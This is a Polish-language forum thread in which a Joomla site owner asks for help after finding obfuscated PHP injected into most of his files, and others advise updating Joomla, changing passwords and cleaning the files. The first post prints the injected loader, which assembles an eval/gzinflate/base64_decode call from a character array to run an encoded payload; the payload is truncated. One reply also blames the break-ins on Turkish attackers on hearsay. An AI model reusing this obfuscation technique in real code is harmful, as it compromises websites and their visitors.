Dopisany kod

[piotrszy]

W wielu plikach php na mojej stronie zauważyłem dopisany kod tego typu:

<?php
$md5 = "263ad6557d326f833b3236e4cda2802d";
$wp_salt = array(';',"$","_","s","o",'c',"b","v","(",'a',"d", '6',"z","n",'r','f',"4",'l',")","g",'i','e','t');
$wp_add_filter = create_function('$'.'v',$wp_salt[21].$wp_salt[7].$wp_salt[9].$wp_salt[17].$wp_salt[8].$wp_salt[19].$wp_salt[12].$wp_salt[20].$wp_salt[13].$wp_salt[15].$wp_salt[17].$wp_salt[9].$wp_salt[22].$wp_salt[21].$wp_salt[8].$wp_salt[6].$wp_salt[9].$wp_salt[3].$wp_salt[21].$wp_salt[11].$wp_salt[16].$wp_salt[2].$wp_salt[10].$wp_salt[21].$wp_salt[5].$wp_salt[4].$wp_salt[10].$wp_salt[21].$wp_salt[8].$wp_salt[1].$wp_salt[7].$wp_salt[18].$wp_salt[18].$wp_salt[18].$wp_salt[0]);
$wp_add_filter('DZZFssWIAQOPk5nywkyVlZmZvUmZnpnZp8 +.....v/wE=');
?>

zajmuje to pierwsze 7 linii prawie każdego pliku. Co to jest? Na ile groźne? Jak to się dopisało? i jak to wywalić, ręcznie.., już mnie nadgarstek boli

---------- Post dodany o 20:11 ---------- Poprzedni post był o 20:10 ----------

Serwer mam na nazwie.pl, a typ joomli 1.5.16 i pózniej przeszedłem do 1.5.23, ale problem pojawił sie przy 1.5.16

[nikszal]

Miałeś niezapowiedzianych gości z Turcji na stronie ?
Pewnie używasz jakieś dziurawe rozszerzenia przez które goście się wkradli.
Jakiego klienta FTP używasz?

[piotrszy]

używam filezilli, skad wiesz że z Turcji?

[nikszal]

Nie wiem na pewno, czy to byli Turcy, ale w większości włamań właśnie oni są sprawcami i często zostawiają w katalogu image swoją graficzną wizytówkę. Sam kiedyś byłem ofiarą włamania.

[piotrszy]

Co zrobić, aby to wyeliminować? Zmieniłem wszystkie hasła dostępowe, w kliencie FTP, na stronach itd. Mam wrazenie, że pomogło, ale jak sprawdzam kody poszczególnych plików to wciąż znajduję nowe i nie wiem, czy nie widziałem ich wczesniej, czy też się się dopisują. Z Palca na pewno tego nie dopisali. Kod md5 za kazdym razem jest inny.
Zaalarmował mnie dostawca serwera, który zwrócił uwage na przekroczone limity uzycia serwera. Po usunieciu tych kodów z index.php, czasy zdecydowanie spadły. ale kody sa dopisane prawie w kazdym pliku php, a na serwerze mam 5 róznych stron. Jak to wywalić?
I czy jak nie wywale to co sie stanie, na ile jest to grożne?

[nikszal]

Co zrobić, aby to wyeliminować? Zmieniłem wszystkie hasła dostępowe, w kliencie FTP, na stronach itd. Mam wrazenie, że pomogło, ale jak sprawdzam kody poszczególnych plików to wciąż znajduję nowe i nie wiem, czy nie widziałem ich wczesniej, czy też się się dopisują.

http://wiki.joomla.pl/index.php/Bezp...wienia_serwera

Jak to wywalić?
I czy jak nie wywale to co sie stanie, na ile jest to grożne?

http://wiki.joomla.pl/index.php/Witr..._w%C5%82amaniu

Przede wszystkim wyłącz podejrzane rozszerzenia, szczególnie te pochodzące z niepewnego źródła.

[kurtz]

być może to joomla! był przyczyną włamania.

wersja 1.5.17 ukazała się w ciągu 2 czy 3 dni po wydaniu 1.5.16 i z tego co pamiętam, była to aktualizacja bezpieczeństwa [?]

poza tym używasz prawie dwu - letniego oprogramowania.

[piotrszy]

Nigdy mi aktualizację joomli nie wychodziły, więc sobie odpuściłem ;-(. Teraz już zaktualizowałem do 1.5.25, więc jest chyba OK, tylko jak wywalić ten kod. To strasznie mrówcza praca.

faktycznie chyba 1.5.16 była przyczyną. Na serwerze mam jeszcze strony postawione na 1.6.5 i 1.7.1 oraz (nie smiejcie sie) 1.0.13 i są czyste. A obie na 1.5.16 zostały zaatakowane.

[nikszal]

Ja nadpisałbym całego Joomla aktualną wersją 1.5.25. Warto jednak sprawdzić czy w instalce nie ma pliku configuration.php, bo wszystko poleci w kosmos.
Wcześniej oczywiście pełna kopia bezpieczeństwa.

[MagicWawa]

Jeśli kod dopisany do plików jest zawsze taki sam, to ściągnij wszystkie pliki strony przez ftp. Przeszukaj katalog z plikami Joomla programem, który wyszukuje ciąg znaków w poszczególnych plikach (polecam PSPad) i zrób "znajdź i zmień". W znajdź wpisz dodany kod w zmień nie wpisuj nic i z automayu wywali Ci wszystko ze wszystkich plików. Zmień hasła do ftp, bazy, zaplecza i nadpisz wyczyszczonymi plikami to, co masz na serwerze. Jak się postarasz, to w sumie zajmie Ci to pół godzinki.